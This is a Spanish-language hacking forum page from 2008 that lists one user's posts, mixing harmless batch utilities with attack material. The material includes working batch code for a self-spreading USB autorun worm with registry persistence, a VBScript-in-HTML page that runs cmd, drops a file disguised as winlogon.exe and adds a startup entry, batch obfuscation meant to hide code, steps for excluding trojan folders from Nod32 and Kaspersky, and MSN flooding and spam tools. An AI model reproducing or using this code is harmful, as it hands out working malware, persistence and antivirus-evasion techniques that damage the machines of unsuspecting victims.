elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: 1 2 [3] 4
21  Programación / Programación Visual Basic / [+] Skull MSN Man. V 0.2 Actualizado 9/04/08!! en: 17 Marzo 2008, 17:41 pm
Saludos, bueno amigos al fin saque mi primera version del MSN Manager V 0.1, esta por problemas que tube cambiando de VB5 a VB6 se me borro el primer MSN Man. que estaba haciendo, y tube que comenzar a crear uno nuevo, este no tiene tantas opciones, pero bueno aqui las explico!..

                           -CapturaS
Form Principal



                           -Opciones d el MSN Man.-

- Contact Flooder, para sacar a tus contactos del Messenger
- Giant Greeting, una opcion que nos permite mandarle un mensaje a TODOS nuestros contactos conectados
- Status Flooder, nos permite floodear con ventanitas popUp Por defecto son 8 ventanitas
- MSN Spam, opcion que nos permite elegir cuantos contactos queramos de la lista(Que esten conectados) y mandarles un mensaje cuantas veces queramos del 1 al Infinito! (No recomiendo poner 25000)
______________________________________________________________________________________

                                                    Version V 0.1.5

Aqui les presento una version mas, esta no sera la ¡nueva! version con muchas cosas incluidas, esta version es mas para arreglar pequeños Bugs del programa, y como todo con nuevas opciones!

Captura Version V 0.1.5



Nuevas Opciones:

+ Arreglo de los Bugs los encontrados!
+ Un nuevo Flooder Nudger, nos permite enviar a 1 solo contacto cuantos nudgeos queramos
+ Ahora podemos crear cuantos menus PopUp queramos, ahora peudes elegir cuantas veces conectarte
+ Un pequeño manual del Contact Flooder


Captura del Status Flooder



Futuras Opciones:

* Pues arreglar mejor los Bugs que se me presenten
* Para Robar avatares, emoticons de tus amigos
* Mejor interfaz de sieño
* Source Code
* y bueno si le quieren poner una nueva opcion por MP


Opciones Propuestas:

* Obtener IP's

Bueno espero que disfruten la nueva version y me den sugerencia, avisos de bugs, etc! ;)

LINK DE DESCARGA: MSN Manager V 0.1.5
LINK DESCARGA: MSN Manager V 0.1
LINK SourceCode: El Source Code es por Privado yo les paso el link para que lo descargen!! ;)

Bueno si les tira algun error porfa me avisan espero que lo disfruten! y no jodan mucho tambien esta su Source code!!!xD Lo siento las imagenes no sirven

_____________________________________________________________________

                                           Version V 0.2

Saludos, bueno aqui les presento la ultima version del Skull MSN Manager este es V 0.2..
A este no le pude hacer la mayoria de las peticiones que me habian hecho, pero hice otras, por escases
de tiempo no pude, pero en fin aqui presentare!....

                           Capturas

Form Principal



Menu nuevo



About





Nuevas Opciones agregadas

- MSN Freezer:
                  Para que congeles las cuentas de tus amigos, recuerda que para congelar las cuentas
esa persona tiene que esta Off-Line, este programa a mi no me dio problemas pero si les da porfavor postear
o contactarme po IM...

- Private PopUp Flood:
                          Pidieron que si podia crear un PopUp Flooder para una sola persona pues
aqui esta, para que floodeen al contacto que quieran en vez de a todos! ;)

- PopUp Block:
                  harto de que te floodeen con ventanitas PopUp, o te fastidian esas ventanitas
peus aqui la solucion, este programa nos permitira si visualizar o no estas ventanitas!....

- Interfas mejorada:
                        Pues medio cambie la interfaz hay, pero solo un poco! ;)

Descarga del Programa: Descarga Aqui

Bueno espero que lo disfruten, y queria agradecerle a SmartGenious por ser mi BETA Tester y a -adriano- por
decirme o aconsejarme de como hacer el private popup flood, jeje en fin un gusto estar con ustedes y dentro de un tiempo, talvez libere el Source Code! :P

Salu2's! 8)
22  Programación / Scripting / Propagacion USB con Batch |By-Skull| en: 11 Marzo 2008, 01:52 am
hola, bueno aqui voy a explicar y aclarar un poco como se ejecutan algunos archivos con un autorun.inf, es simple, comenzemos...

Necesario:

crear un archivo autorun.inf
tu programa bat llamalo en este caso d.bat
y el .bat encargado de lo demas..
Quick Batch File Compiler


Bueno comenzemos lo hare breve y sencillo este constara cuando la persona ejecute o introduzca su pendrive este le va a salir un cartel que diga que es lo que desea hacer, si el elige por ejemplo la opcion de abrir el pendrive ejecutara nuestro archivo.bat (Tambien puede ser con un .exe, .vbs, etc)

Contenido del autorun.inf
Código:
[Autorun]
label=Pendrive
action=Abrir Pendrive
Icon=Icon.ico
shellexecute= "/d.bat"

bueno explico un poco label es el nombre por ejemplo cuando conectamos el pendrive como se vera si accesedemos a este por mi PC action es la accion de que cuando conectes el pendrive, este te dira que accion deseas realizar (Si ejecuta la de abrir pendrive ejecutara el .bat) Icon es el icono con el que nuestro archivo se vera y shellexecute ejecuta nuestro archivo en este caso el .bat...

ahora lo que contendra el d.bat pues eso se queda a vuestro antojo si quieren que sea virus, broma, etc... ahora si ponen por ejemplo la opcion icon (Se la pueden quitar) tiene que meter un icono adentro del pendrive, si es como si abrieran el pendrive y introdujeran el autorun el bat y el icono, a mi punto de vista yo trabajare sin el icon que es mejor....

ok ahora como metemos todo esto pues miren pueden crear un .bat que cree por ejemplo el autorun.inf y el bat en el C:\ y luego ese .bat vaya a una label y compruebe que si exciste el F:\ (en este caso este se supone que es el pendrive) copie todo lo que es el autorun.inf y el .bat a este sino vuelva al inicio y vuelva a comprobar si exciste, aqui un breve code para que vean como funciona:

Citar
  @echo off
:hi
cls
if EXIST "F:\" (goto si) else (goto hi)

:si
msg * si
copy /y "C:\autorun.inf", "F:\"
copy /y "C:\d.bat", "F:\"
exit

pues es asi de simple ahora que pasa si el pendrive tiene por defecto G:\, pues sinceramente tendrian  que hacer que en vez que vuelva a chekear si existe el F:\ vaya a otro y verifique si exciste el G:\ sino existe que vuelva a comprobar si exciste el F:\ y asi susecivamente..
Skull pero que pasa si apaga la PC? pues simple tiene que agregarlo al registro! ;)
Skull pero que pasa si ya esos archivos estan copiados en el pendrive? pues puedes elegir que si por ejemplo este verifica que excistes el F:\ luego verifique si exciste los archivos si existen ejecute el exit sino los copie! ;)

Skull pero no dara mucha tension que salga un pantalla negra? pues para eso les pedi el Batch file compiler para que usen el modo ghost! ;) y eso, ahora como se que no me explique muy bien aqui dejo un simple code que explica todo! ;)

Citar
@echo off
copy /y %0 "C:\WINDOWS"
reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d C:\d.exe /f
if EXIST "C:\Autorun.inf" (goto kaki) else (goto xx)

:kaki
if EXIST "C:\d.bat" (goto hi) else (goto Xx)

:xx
echo [Autorun] > C:\Autorun.inf
echo label=Pendrive >> C:\Autorun.inf
echo action=Abrir Pendrive >> C:\Autorun.inf
echo shellexecute= "/d.bat" >> C:\Autorun.inf
echo reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d C:\d.bat /f >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
echo start >> C:\d.bat
Echo :hik >> C:\d.bat
echo msg * HackedBy-Skull [Worm-Autopia] >> C:\d.bat
echo goto hik >> C:\d.bat
cls
goto hi

:hi
cls
if EXIST "F:\" (goto si) else (goto hi)

:si
if EXIST "F:\Autorun.inf" (goto si1) else (goto si2)

:si1
goto hi

:si2
copy /y "C:\autorun.inf", "F:\"
copy /y "C:\d.bat", "F:\"
goto hi

:ex
goto hi

bueno ese es el code, por razones de explicacion no lo hice mas dificl pero el d.bat pueden hacer que tambien cree otros .bat que hagan lo mismo, dejen payload que si X's dia ejecute un archivo que haga algo nose eso se los dejo a ustedes! ;)
Recuerden usar el batch file compiler para hacer el .bat en modo ghost! para que no cante tanto!
otra cosa que podrian hacer seria usar el BattoExe y poner que no salga la pantalla negra y en el evento que detecta los USB en vez de copiar otro batch se cpie a si mismo claro aqui ya ese batch deberia tener algo que si la brboma, el codigo del virus, etc.:.

Salu2's! 8)
23  Programación / Programación Visual Basic / Como puedo ver las personas que me tienen sin admision en el MSN en: 3 Marzo 2008, 02:22 am
si, bueno estaba creando una aplicacion para msn y se me ocurrio meter esta aplicacion, pero sinceramente no tengo una idea de como poder hacer esto, ver las personas que me tienen sin admision en el msn, se me ha hecho al tedioso y no e encontrado algo concreto en el Google!....

A ver si alguno de ustedes me podria ayudar con esto, darme que se yo lo que se use para poder visualizarlas!...

Salu2's!  ::)
24  Programación / Programación Visual Basic / [Proyecto] Skull Trojan's Utility 0.1 en: 23 Febrero 2008, 18:30 pm
Saludos, bueno amigos, como mi foro esta bajo horita, bueno queria crear un proyecto para este foro, que lo creemos entre todos, claro si ustedes quieren participar, pues me explico:

¿Para que es este proyecto?

Este proyecto es como dice el nombre Trojan's utility, que consistira en un solo programa que contendra muchas de las utilidades que necesitamos para vuestro troyano, que si joiner, icon changer's, crypter, FW-Killer's, etc..
Esto se queda para las personas que quieran aportar ideas...

Ideas del troyano:

Bueno hasta los momentos no tengo muchas ideas, pero espero que me puedan dar mas ideas para ir trabajando en este proyecto, que sera de todos, lo que llevo hasta ahora es:

Utilidad                                       Entregado

- Icon Changer                           - Listo
- Joiner                                       - Listo
- Crypter                                     - Working...
- FW-Killer                                  - Falta
- Propagacion USB                     - Falta

Bueno por los momentos son muy pocas ideas las que tengo, y espero que porfavor me den ideas, e incluso si ustedes quieren trabajar en este proyecto, que espero que alguno se anime a trabajar en este proyecto, pues claro son bienvenidos, y claro como todo, tendran su parte de reconocimiento...

Requisitos para entrar al proyecto

1- Tener un conocimiento por lo menos avanzado
2- si van a hacer por ejemplo un AV-Killer este debe ser entregado con su respectivo code, y para donde va el code a que boton (mejor si se sube el proyecto)
3- Gozar un monto y hacer el code con cariño! :P

Apuntados al proyecto:

Integrante(s):

- Skullmaster123


Bueno espero que se animen, y si no quieren particiapr por lo menos denme alguna idea para agregarle al proyecto! creo que deberia agregarle la opcion de propagacion por msn, p2p, LAN, etc... pero bueno veamos que opinan ustes programadores, y a ver si se animan a trabajar en el proyecto! ;)

Salu2's! 8)
25  Programación / Scripting / Folder's-Searcher Busca tus archivos perdidos |By-Skull| en: 18 Febrero 2008, 04:28 am
Saludos, bueno aqui les presento un programa para buscar su archivos de cualquier extension, en las carpetas de su sistema, creado 100% batch, pasado a .exe, y por supuesto, creado por Skullmaster123 bueno espero que lo disfruten, el programa trae un manual incorporado! ;)

LINK DE DESCARGA:  http://rapidshare.com/files/92773768/Folder_s-Searcher.exe.html

Salu2's! Cool
26  Programación / Programación Visual Basic / una ayuda con el modo ghost? en: 10 Febrero 2008, 04:20 am
saludos, bueno no se si hallan visto esos programas por ejemplo para batch que cuando los compilas a .exe puedes ponerle la opcion de modo ghost, bueno mi pregunta es la siguiente:

¿Cual seria el code, o la API o lo que sea que se usa para hacer eso?

Salu2's! 8)
27  Informática / Tutoriales - Documentación / Excluir carpetas (con troyanos, virus, etc) de los AV |By-Skull| en: 9 Febrero 2008, 21:16 pm
Saludos, bueno aqui posteo algo que aprendi ya hace tiempo de un excelente mod de otro foro que se llama Angelus_7722 y bueno quiero poner en practica lo que aprendi de el! ;) no voy a poner todos los AV de una sola vez, pondre mientras unos pocos!...

                                                                                          Nod32

Lo primero que haremos es darle clic izquierdo al icono ubicado en la barra de herramnientas



Seleccionamos el modulo  AMON



pinchamos conf. (configuracion)



Selecionamos la pestaña Exclusión y luego seleccionamos Agregar



pinchamos en la carpeta



buscamos la carpeta donde esta alojado el troyano



Lo siguiente es mantener la configuracion de la captura de pantalla y damos clic en Aceptar



Listo


                                                              Kaspersky

Hacemos el primer procedimiento ubicamos el icono, etc..
Ahora seleccionamos en el modulo Protección la opcion de Antivirus de Archivos



le damos donde dice configurar



le damos en Amenazas y exclusiones y en la sección de exclusiones pinchamos Zona de confianza



le damos en agregar
En descripcion de la regla damos clic en Objeto: especificar



Lo siguiente que haremos es darle clic a Examinar pero antes debemos marcar la opcion Incluir Subcarpetas (como se daran cuenta olvidé hacerlo)



Ahora buscamos la carpeta que vamos a excluir, como hicimos anteriormente.
y como ven ya esta excluida y solo queda dar los respectivos Aceptar



Listo



                                                      Proximamente

-Avast
-Norton
-Mejor detallado con color, etc..
28  Programación / Scripting / Coleccion de Folder's Protector + Source Code! |By-Skull| en: 9 Febrero 2008, 21:10 pm
Saludos, bueno aqui les traigo la coleccion de Folder Protector hecha por muchos mienbros de otro foro y yo! 100% batch.

Que es Folder Protector?

es un programa hecho en batch que protege tus carpetas, para que solo tu las puedas utilizar o mejor dicho ver su contenido! ;)

Como se utiliza?

Pues para bloquear y desbloquear las carpetas el programa tiene que estar al lado de la carpeta que vas a bloquear, el programa de por si trae un manual incluido en su sistema! ;)

                                                              LINK'S DE DESCARGA:

Folder's Protector V1.0

Primera Version de todas, creada por SmartGenious y yo!
Link: http://rapidshare.com/files/74153751/FolderProtector.exe.html
Pass: el-hacker.co m (la m va pegada al co)

Folder's Protector V2.0

Segunda Version de este maravilloso programa con unas nuevas opciones (alguien me altero el code ciertas cosas¬¬) :P

LINK: http://two.xthost.info/smartgenius/FolderProtector.zip
Pass: el-hacker.co m (la m va pegada al co)
                             Descripcion:

En el archivo Zip Vienen los Instaladores de Tres Versiones...

2.0 Version mejorada de la 1, se cambio el metodo de proteccion de la papelera
por el de FTP, ademas del cambio de icono y una dll que muestra un aviso.

2.1 En esta version se usa el metodo del ZIPFOLDER, se cambio del metodo FTP
y del metodo usado en la 1, porque en algunos Win XP se mostraba el codigo
de la proteccion, permitiendo que la carpeta fuese accesada...


2.2 Se continua con el mismo metodo de la ver. 2.1, ademas se agrega
uan opcion para poder cambiar de la contrasela por defecto.

Folder's Protector (Version FINAL)

Esta version actualmente se esta construyendo con mejores opciones que las versiones anteriores, poder bloquear carpetas desde otra ubicacion del programa, etc, etc..
cuando salga lo posteo, y claro como regalo especial, para aquel foro, se dara el Source code! ;)

Ahora el Source Code de la V 2.0:

                                                                 Source Code V2.0

@echo off
color 0a
if exist "C:\WINDOWS\system32\CarpetasBloqueadas\info.txt" goto exc else (goto nex)

:nex
if exist "C:\WINDOWS\system32\zipfldr.dll" goto existe else (goto nexis)

:nexis
 @echo off
color 0a
cls
copy /y "C:\zipfldr.dll", "C:WINDOWS\system32\"
echo.
del /f /q "C:\zipfldr.dll"
cls
goto panda

:existe
 @echo off
color 0a
cls
del /F /Q "C:\WINDOWS\system32\zipfldr.dll"
copy /y "C:\zipfldr.dll", "C:WINDOWS\system32\"
del /F /Q "C:\zipfldr.dll"
goto panda

:panda
 @echo off
color 0a
title Cargando datos de aplicacion...
cls
echo Cargando por favor espere.
echo.
echo 0 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere..
echo.
echo 0 == 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere...
echo.
echo 0 ===== 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere.
echo.
echo 0 ========= 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere..
echo.
echo 0 ============== 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere...
echo.
echo 0 ================== 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere.
echo.
echo 0 ====================== 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere..
echo.
echo 0 ======================== 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando por favor espere...
echo.
echo 0 ========================= 100
ping -n 1 0.0.0.0.0 > nul
cls
echo Cargando variables...
echo.
echo 0 ========================= 100
ping -n 1 0.0.0.0.0.0 > nul
cls
echo Creando directorios...
echo.
echo 0 ========================= 100
ping -n 1 0.0.0.0.0 > nul
MD C:\WINDOWS\system32\CarpetasBloqueadas\
echo Nombre          Ubicacion          Nombre Carpeta Reemplazadora >> C:\WINDOWS\system32\CarpetasBloqueadas\info.txt
echo el-hacker.com  >> C:\WINDOWS\p.tmf
cls
echo Cargando aplicacion...
echo.
echo 0 ========================= 100
ping -n 1 0.0.0.0.0 > nul
Title Folder-Protector Vol 2.0
cls
echo .::Bienvenido al Folder-Protector Vol 2.0::.
pause > nul
cls
:men
cls
echo Eliga una opcion:
echo.
echo 1- Bloquear una Carpeta
echo 2- Desbloquear una Carpeta
echo 3- Ver Carpetas Bloqueadas/Desbloqueadas
echo 4- Definir Contraseña
echo 5- Informacion y uso del Programa *Importante
echo 6- Desinstalar el programa
echo 7- Salir del programa
echo.
set /p opc=
if %opc%==1 goto blo
if %opc%==2 goto des
if %opc%==3 goto ver
if %opc%==4 goto eci
if %opc%==5 goto info
if %opc%==6 goto desi
if %opc%==7 goto out

:blo
 @echo off
color 0a
cls
echo Escriba la UBICACION de la carpeta a Bloquear,
set /p ubi=
cls
echo Escriba el nombre de la carpeta a Bloquear (Solo el nombre)
set /p nom=
cls
:ki
echo Desea que la carpeta aparezca con otro nombre.
echo (Por defecto tendra el nombre de Protected).(s/n)
set /p opccc=
if %opccc%==s goto cla
if %opccc%==n goto pex
if %opccc%==%opccc% goto jod

:jod
 @echo off
color 0a
cls
echo Parametro erroneo...
pause > nul
cls
goto ki

:cla
 @echo off
color 0a
cls
echo Eliga el nombre que le dara a esta "carpeta"
set /p vaxi=
ren %nom% %vaxi%.{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
msg * /w Carpeta Bloqueada exitosamente...
cls
echo %nom%          %ubi%          %vaxi% >> C:\WINDOWS\system32\CarpetasBloqueadas\info.txt
cls
goto men

:pex
 @echo off
color 0a
cls
ren %nom% Protected.{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
msg * /w Carpeta Bloqueada exitosamente...
cls
echo %nom% %ubi% Protected >> C:\WINDOWS\system32\CarpetasBloqueadas\info.txt
goto men

:des
 @echo off
color 0a
cls
echo Escriba el nombre de la carpeta anteriormente bloqueada
set /p nom=
cls
echo Si cambio el nombre por defecto escribalo, sino coloque Protected
set /p ree=
cls
ren %ree%.{888DCA60-FC0A-11CF-8F0F-00C04FD7D062} %nom%
echo %nom% XXX %ree% *Desbloqueada >> C:\WINDOWS\system32\CarpetasBloqueadas\info.txt
msg * /w Carpeta Desbloqueada...
cls
goto men

:ver
 @echo off
color 0a
cls
more C:\WINDOWS\system32\CarpetasBloqueadas\info.txt
Pause > nul
goto men

:info
 @echo off
color 0a
cls
echo Que desea hacer
echo.
echo 1- Ver Manual del programa
echo 2- Ver Informacion del programa...
set /p opc=
if %opc%==1 goto ff
if %opc%==2 goto f
if %opc%==%opc% goto info

:ff
 @echo off
color 0a
cls
echo ..:::Manual del programa:::..
echo.
echo Se recomienda poner el programa junto a la carpeta a bloquear o desbloquear
echo esto es para que el programa funcione al 100 de su capacidad, aunque se aceptan tambien
echo rutas de directorio.
echo La carpeta que queda al bloquear la carpeta original se llama Carpeta Reemplazada
echo para bloquear la carpeta escriba el nombre de la carpeta a bloquear si se encuentra en el mismo directorio
echo que el programa omitiendo la parte donde pide direccion o ruta, de lo contrario pues introduce la ruta de
echo la carpeta. (Si la ruta tiene espacios entonces la escribe entre comillas " ").
echo
echo.
echo Para desbloquear(Anteriormente dicho, el programa debe estar junto a la carpeta)
echo solo se coloca el nombre que tenia la carpeta antes de ser bloqueada,
echo luego de esto se pone el nombre que se le dio (o en su defecto Basura)
echo.
echo Una cosa si por ejemplo usted bloquea una carpeta en C: con el nombre de la carpeta Reemplazada
echo Protected y vuelve a bloquear otra carpeta con el mismo nombre, esto NO sera permitido, asi que
echo debera cambiarselo para que no hallan problemas! Smiley
echo.
pause
goto men

:f
 @echo off
color 0a
cls
echo Nombre del programa: Folder's-Protector Vol 2.3
echo.
echo Mejoras de la version
echo Se cambio el metodo de proteccion con respecto a la version 1
echo que usaba la papelera y la version 2.1 que usaba el FTP Folder.
echo En esta version se usa el metodo del ZIPFOLDER usado en la 2.2
echo pero con la mejora de poder cambiar la contraseña por defecto.
echo.
echo Creadores:
echo.
echo .- SkullMaster123
echo .- .::SmartGenius::.
echo .- DaRkDiAmOnd
echo .- sh4k4
echo .- The Shadow
echo Y todos los demas user's de la C.U.H que nos han colaborado.
pause > nul
echo Dedicado a la Comunidad Underground Hispana  foro.el-hacker.com
pause > nul
cls
goto men

:desi
 @echo off
color 0a
cls
echo Preparando para desinstalacion.
ping -n 1 0.0.0.0 > nul
cls
echo Preparando para desinstalacion..
ping -n 1 0.0.0.0 > nul
cls
echo Preparando para desinstalacion...
ping -n 1 0.0.0.0 > nul
cls
echo Aguarde mientras se desinstala el programa.
ping -n 1 0.0.0.0 > nul
cls
echo Aguarde mientras se desinstala el programa..
ping -n 1 0.0.0.0 > nul
cls
echo Aguarde mientras se desinstala el programa...
ping -n 1 0.0.0.0 > nul
cls
del /F /Q "C:\WINDOWS\system32\CarpetasBloqueadas\info.txt
del /F /Q "C:\WINDOWS\system32\CarpetasBloqueadas\"
echo Gracias por usar el folder's Protector >> info.txt
echo Mas informacion aqui en http://foro.el-hacker.com/index.php >> info.txt
msg * Gracias por usar el Folder's Protector
exit


Bueno este code hay cosas que me le cambiaron como la barra cargadora, y para ver las carpetas bloqueadas y desbloqueadas, etc... pero bueno la ultima version sera la mejor de todas! ;) espero que disfruten esto..

P.D: Disculpen mods por lo del pass es que fue dedicado a otro foro, y le pusieron ese pass, espero que me perdonen!

Salu2's! cool
29  Programación / Scripting / introduccion al cifrado en batch |By-Skull| en: 9 Febrero 2008, 21:05 pm
Saludos, bueno abro este post para enseñar o introducirlos un poco a que es el cifrado en batch! ;)

¿Que es cifrar en batch?

Bueno este metodo consiste en darle valores a ciertas variables (muchas en este caso) mediante el set NameVariable = Codigo esto sirve para de cierta manera hacer que no se entienda un codigo, mensaje, etc...

Ejemplo:

Este ejemplo es muy simple y se entiende pero lo pongo para ue vena a que me refiero! ;)

set v=s
set v1=h
set v2=u
set v3=t
set v4=d
set v5=o
set v6=w
set v7=n
set v8=-s
set v9=-t
set v10=200

%v%v1%%v2%%v3%%v4%%v5%%v6%%v7% %v8% %v9% %v10%


pues si no me equivoco y no me confundi!XD eso quedaria como shutdown -s -t 200, claro esto es un cifrado simple que hasta TxShack puede entender!XD (Broma) pero algo mucho mas avanzado seria de esta manera:

@echo off
set pnvb=nnt
set pnvb=s
GoTo pnvb
set pnvb=uz
:pnvb
set iwyh=jbr
set iwyh=e
GoTo iwyh
set iwyh=op
:iwyh
set lidg=njk
set lidg=t
GoTo lidg
set lidg=pl
:lidg
%pnvb%%iwyh%%lidg% fo=fmp
%pnvb%%iwyh%%lidg% fo=a
GoTo fo
%pnvb%%iwyh%%lidg%  fo=ah
:fo
%pnvb%%iwyh%%lidg% dc=rkx
%pnvb%%iwyh%%lidg% dc=b
GoTo dc
%pnvb%%iwyh%%lidg%  dc=tt
:dc
%pnvb%%iwyh%%lidg% dx=iso
%pnvb%%iwyh%%lidg% dx=c
GoTo dx
%pnvb%%iwyh%%lidg%  dx=ej
:dx
%pnvb%%iwyh%%lidg% ki=quo
%pnvb%%iwyh%%lidg% ki=d
GoTo ki
%pnvb%%iwyh%%lidg%  ki=mh
:ki
%pnvb%%iwyh%%lidg% tp=jgj
%pnvb%%iwyh%%lidg% tp=e
GoTo tp
%pnvb%%iwyh%%lidg%  tp=hp
:tp
%pnvb%%iwyh%%lidg% qj=jqd
%pnvb%%iwyh%%lidg% qj=f
GoTo qj
%pnvb%%iwyh%%lidg%  qj=gp
:qj
%pnvb%%iwyh%%lidg% ih=kru
%pnvb%%iwyh%%lidg% ih=g
GoTo ih
%pnvb%%iwyh%%lidg%  ih=rt
:ih
%pnvb%%iwyh%%lidg% fs=qgw
%pnvb%%iwyh%%lidg% fs=h
GoTo fs
%pnvb%%iwyh%%lidg%  fs=lw
:fs
%pnvb%%iwyh%%lidg% lr=xub
%pnvb%%iwyh%%lidg% lr=i
GoTo lr
%pnvb%%iwyh%%lidg%  lr=cj
:lr
%pnvb%%iwyh%%lidg% qb=poe
%pnvb%%iwyh%%lidg% qb=j
GoTo qb
%pnvb%%iwyh%%lidg%  qb=ba
:qb
%pnvb%%iwyh%%lidg% gm=qdn
%pnvb%%iwyh%%lidg% gm=k
GoTo gm
%pnvb%%iwyh%%lidg%  gm=zh
:gm
%pnvb%%iwyh%%lidg% vg=tco
%pnvb%%iwyh%%lidg% vg=l
GoTo vg
%pnvb%%iwyh%%lidg%  vg=xi
:vg
%pnvb%%iwyh%%lidg% tt=ikt
%pnvb%%iwyh%%lidg% tt=m
GoTo tt
%pnvb%%iwyh%%lidg%  tt=fw
:tt
%pnvb%%iwyh%%lidg% jj=gji
%pnvb%%iwyh%%lidg% jj=n
GoTo jj
%pnvb%%iwyh%%lidg%  jj=li
:jj
%pnvb%%iwyh%%lidg% hk=yvg
%pnvb%%iwyh%%lidg% hk=o
GoTo hk
%pnvb%%iwyh%%lidg%  hk=gi
:hk
%pnvb%%iwyh%%lidg% dy=otb
%pnvb%%iwyh%%lidg% dy=p
GoTo dy
%pnvb%%iwyh%%lidg%  dy=we
:dy
%pnvb%%iwyh%%lidg% af=vfa
%pnvb%%iwyh%%lidg% af=q
GoTo af
%pnvb%%iwyh%%lidg%  af=zl
:af
%pnvb%%iwyh%%lidg% qi=stu
%pnvb%%iwyh%%lidg% qi=r
GoTo qi
%pnvb%%iwyh%%lidg%  qi=es
:qi
%pnvb%%iwyh%%lidg% nf=oym
%pnvb%%iwyh%%lidg% nf=s
GoTo nf
%pnvb%%iwyh%%lidg%  nf=vd
:nf
%pnvb%%iwyh%%lidg% vz=zwi
%pnvb%%iwyh%%lidg% vz=t
GoTo vz
%pnvb%%iwyh%%lidg%  vz=qz
:vz
%pnvb%%iwyh%%lidg% pk=uqo
%pnvb%%iwyh%%lidg% pk=u
GoTo pk
%pnvb%%iwyh%%lidg%  pk=yb
:pk
%pnvb%%iwyh%%lidg% fv=hxk
%pnvb%%iwyh%%lidg% fv=v
GoTo fv
%pnvb%%iwyh%%lidg%  fv=et
:fv
%pnvb%%iwyh%%lidg% nt=xta
%pnvb%%iwyh%%lidg% nt=w
GoTo nt
%pnvb%%iwyh%%lidg%  nt=zj
:nt
%pnvb%%iwyh%%lidg% zr=eit
%pnvb%%iwyh%%lidg% zr=x
GoTo zr
%pnvb%%iwyh%%lidg%  zr=vq
:zr
%pnvb%%iwyh%%lidg% qw=lgo
%pnvb%%iwyh%%lidg% qw=y
GoTo qw
%pnvb%%iwyh%%lidg%  qw=jp
:qw
%pnvb%%iwyh%%lidg% aq=yqc
%pnvb%%iwyh%%lidg% aq=z
GoTo aq
%pnvb%%iwyh%%lidg%  aq=og
:aq
%pnvb%%iwyh%%lidg% un=rrg
%pnvb%%iwyh%%lidg% un=GoTo un
%pnvb%%iwyh%%lidg%  un=ye
:un


%tt%%nf%%ih% * "%dc%%fo%%vz%%dx%%fs% %dx%%lr%%qj%%qi%%fo%%ki%%hk%!!"


y si no me equivoco esto te deberia mostrar un msg * Ysumensaje

Cual es la desventaja de esto, que hace la parte del code cifrado MUY lenta como se ve en el ejemplo de arriba! ;) pero si sirve, esto con el metodo de encapsulacion (.EXE) es muy util y sirve para proteger tu code! ;)

Salu2's! cool
30  Programación / Scripting / Ejecutar lineas de batch desde codigo HTML |By-Skull| en: 9 Febrero 2008, 21:04 pm
Bueno esta tecnica si es vieja!XD me la se desde el año pasado o mas creo yo, epro veo que no muchos la conocen asi que pues la enseño aqui, con esto pueden ejecutar sus codigos desde cualquier pagina que tenga e incluso pruebenlo, abren el notepad, ponen este code y lo guardan como html! ;)
 
                                                 CODIGO:



<!--aki esta el script k ace la magia, la parte k esta en rojo es en la k tienes k meter el codigo de lo k
 kieras ejecutar, cada linea del bat unela con "&"(sincomiyas)-->
<script language="vbs">
   on error resume next
   Set shell = createObject("Wscript.shell")

   shell.run("cmd.exe /c @echo off & color a & echo ola mundooooooooo......... & msg * holaaa & pause & exit")
   set fso=createObject("Scripting.fileSystemObject")
   set miArchivo = fso.CreateTextFile("\bUSik.vbs", 2, false)
   miArchivo.writeline("do" )
   miArchivo.writeline("msgbox(" & chr(34) & "eres una gorda" & chr(34) & ")" )
   miArchivo.writeline("loop" )
   miArchivo.Close
   if fso.getfile("\bUSik.vbs") = "" then
      wscript.popup("Permiso denegado, cierre la sesion e iniciela de nuevo como administrador")
   else
      randomize timer
      numer = int(rnd * 3)
      select case numer
      case 1
         nume="login32.exe"
      case 2
         nume="winlogon.exe"
      case 3
         nume="msagent.exe"
      case else
         nume="updater32.exe"
      end select
      set winDir=fso.GetSpecialFolder(0)
      set sysDir=fso.GetSpecialFolder(1)
      set vx = fso.CreateTextfile(windir & "\" & nume,2,false)
      vx.writeline("MZ")
      vx.Close
      shell.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Winlogon", winDir & "\" & nume
      shell.run("wscript " & windir & "\" & nume)
      shell.run("wscript \bUSik.vbs")
   end if
</script>
<!--esta parte ace k se cierre la ventana del IE-->
<script language="javascript">
   close();
</script>

</html>

Bueno este code es viejo y lo tenia guardado en un .txt de mi pcXD ni me acuerdo cuando lo hice o de donde lo saque! :P pero la parte roja es el de la SHELL (cmd)
bueno no recuerdo bien pero el code que lo hace funcionar es asi:

enseño aqui, con esto pueden ejecutar sus codigos desde cualquier pagina que tenga e incluso pruebenlo, abren el notepad, ponen este code y lo guardan como html! ;)
 
                                                 CODIGO:



<script language="vbs">
   on error resume next
   Set shell = createObject("Wscript.shell")

   shell.run("cmd.exe /c @echo off & color a & echo ohola el mioooo & msg * holaa & pause & exit")
</script>

pues si tiene error avisenme llevo años que no pruebo esta tecnica, y no se si es asi!
Una cosa IMPORTANTE, NO ejecuten el code que les deje arriba! ;) osea el primero ya el segundo si peuden e saquen variasiones! ;)

Salu2's! cool
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines